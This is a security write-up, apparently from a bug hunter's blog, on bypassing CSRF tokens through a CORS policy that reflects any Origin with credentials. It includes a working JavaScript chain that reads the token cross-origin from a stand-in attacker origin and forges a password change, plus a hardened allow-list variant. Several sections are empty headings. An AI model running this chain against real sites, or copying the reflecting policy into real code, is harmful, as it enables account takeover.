Bypassing CSRF token protection by abusing a misconfigured CORS policy


Brief explanation of SOP, CORS and CSRF (skip if you already know them)

Same-Origin Policy (SOP)

The SOP restricts what a document loaded from one origin can do with resources from another origin. Among other things, it stops:

  • JavaScript on Site A from reading the cookies of Site B.
  • JavaScript on Site A from reading the content of responses from Site B.

Cross-Origin Resource Sharing (CORS)

CORS is the mechanism a server uses to relax the SOP: through the Access-Control-Allow-Origin header (and Access-Control-Allow-Credentials when cookies should be sent) it tells the browser which foreign origins may read its responses. A policy that reflects whatever Origin it receives, while also allowing credentials, lets any site read authenticated responses on behalf of the victim.

Cross-Site Request Forgery (CSRF)

  • A relevant action: something worth forcing the victim to do, such as changing their password or email address.
  • Cookie-based session handling: the browser attaches the session cookie automatically, and no other authentication method (for example a custom header) is required.
  • No unpredictable request parameters: the attacker does not have to guess any values. For example, a change-password function is not vulnerable if the attacker needs to know the current password (whereas changing the account's email to one the attacker controls would be a usable action). A CSRF token is exactly such an unpredictable parameter; the rest of this post shows how a misconfigured CORS policy lets the attacker read it first.

Understanding our target before the attack

Screenshots (images not preserved in this copy):

  • Main page
  • Registration as user/user
  • Login request (not important)
  • Logged in, and the Change Password page
  • CSRF token in the HTML form
  • Change password request
  • Change password response
  • Change password request, re-sent to test for the CORS vulnerability
  • Change password response to that test

The Attack

Exploit: Part 1

Exploit: Part 2

Wrapping everything up!

Complete attack requests (screenshots not preserved in this copy):

  • 2nd request: CSRF token extraction request
  • 2nd request response: CSRF token extraction response
  • 3rd request: the actual CSRF attack with the token included and the password we chose. Account takeover.
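The whole chain, as an added example (not code from the original post): a stub of the vulnerable application whose CORS policy reflects any Origin and allows credentials, the check used when testing for the CORS vulnerability, the token extraction of exploit part 1, and the credentialed replay of exploit part 2. The origins, the /change-password path, the csrf_token and new_password field names, and the stub server are all assumptions made for this example; a hardened allow-list policy is included beside the vulnerable one to show why the read fails when the policy is correct.

```javascript
// Added example, not code from the original post. It models the chain the
// write-up describes: a server whose CORS policy reflects any Origin and also
// sets Access-Control-Allow-Credentials: true lets a page on the attacker's
// origin read the victim's change-password form (with its CSRF token) and
// then replay it. Origins, path, field names and the stub server are all
// assumptions made for this example.

const TARGET = 'https://victim.example';            // assumed target origin
const ATTACKER_ORIGIN = 'https://attacker.example'; // assumed origin of the attacker page
const TOKEN_FIELD = 'csrf_token';                   // assumed hidden-input name

// The misconfiguration: reflect whatever Origin arrives and allow credentials.
// Browsers refuse "*" together with credentials, so reflection is what makes
// a cookie-authenticated cross-origin read possible.
function vulnerableCorsHeaders(requestOrigin) {
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
  };
}

// Hardened variant: only origins on an explicit allow-list are ever reflected.
function hardenedCorsHeaders(requestOrigin, allowlist) {
  if (!allowlist.includes(requestOrigin)) return {}; // no CORS headers at all
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
    'vary': 'Origin', // keep caches from serving one origin's headers to another
  };
}

// The check behind "testing CORS vuln": a browser lets our script read a
// credentialed response only if ACAO equals our origin exactly and ACAC is
// "true". headers is anything with a get(name) method (fetch Headers or a Map).
function isExploitableCors(headers, ourOrigin) {
  return headers.get('access-control-allow-origin') === ourOrigin &&
         headers.get('access-control-allow-credentials') === 'true';
}

// Exploit part 1: pull the CSRF token out of the HTML form.
function extractCsrfToken(html) {
  for (const tag of html.match(/<input\b[^>]*>/gi) || []) {
    const name = /\bname=["']([^"']*)["']/i.exec(tag);
    const value = /\bvalue=["']([^"']*)["']/i.exec(tag);
    if (name && name[1] === TOKEN_FIELD && value) return value[1];
  }
  return null;
}

// Exploit part 2: the script served from the attacker page. fetchImpl is
// injectable so the same code can be driven by the offline stub below. In a
// real browser a non-exploitable policy makes the fetch itself reject; the
// explicit check here mirrors that decision.
async function takeover(newPassword, fetchImpl = globalThis.fetch) {
  const page = await fetchImpl(`${TARGET}/change-password`, { credentials: 'include' });
  if (!isExploitableCors(page.headers, ATTACKER_ORIGIN)) {
    throw new Error('CORS policy does not expose the response to our origin');
  }
  const token = extractCsrfToken(await page.text());
  if (!token) throw new Error('CSRF token not found in form');
  const body = new URLSearchParams({ [TOKEN_FIELD]: token, new_password: newPassword });
  const resp = await fetchImpl(`${TARGET}/change-password`, {
    method: 'POST',
    credentials: 'include',
    headers: { 'content-type': 'application/x-www-form-urlencoded' },
    body: body.toString(),
  });
  return resp.status;
}

// Offline stand-in for the vulnerable application (constructed for this
// example). It has cookie-based sessions (credentials must be included),
// a per-session CSRF token, and a pluggable CORS policy.
function makeVictimStub(corsPolicy) {
  const state = { password: 'user', token: 'deadbeef' };
  async function fetchStub(url, init = {}) {
    // A browser would send the attacker page's Origin; the stub assumes it.
    const headers = new Map(Object.entries(corsPolicy(ATTACKER_ORIGIN)));
    const reply = (status, text) => ({ status, headers, text: async () => text });
    if (init.credentials !== 'include') return reply(401, 'no session cookie');
    if (new URL(url).pathname !== '/change-password') return reply(404, '');
    if ((init.method || 'GET').toUpperCase() === 'GET') {
      return reply(200, `<form method="POST"><input type="hidden" value="${state.token}" name="${TOKEN_FIELD}">` +
                        `<input name="new_password"><button>Change</button></form>`);
    }
    const params = new URLSearchParams(init.body);
    if (params.get(TOKEN_FIELD) !== state.token) return reply(403, 'bad CSRF token');
    state.password = params.get('new_password');
    return reply(200, 'password changed');
  }
  return { fetch: fetchStub, state };
}

// Run the chain against the misconfigured stub.
const victim = makeVictimStub(vulnerableCorsHeaders);
takeover('pwned123', victim.fetch).then((status) =>
  console.log(`POST status ${status}, victim password is now "${victim.state.password}"`));
```

Swapping vulnerableCorsHeaders for hardenedCorsHeaders with an allow-list that does not contain the attacker origin makes takeover throw at the CORS check, which is the same outcome a browser produces when it refuses to expose the response: the token never leaves the victim's origin and the CSRF protection holds.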

Final words




Security Researcher | Bug Hunter @LihaftSec
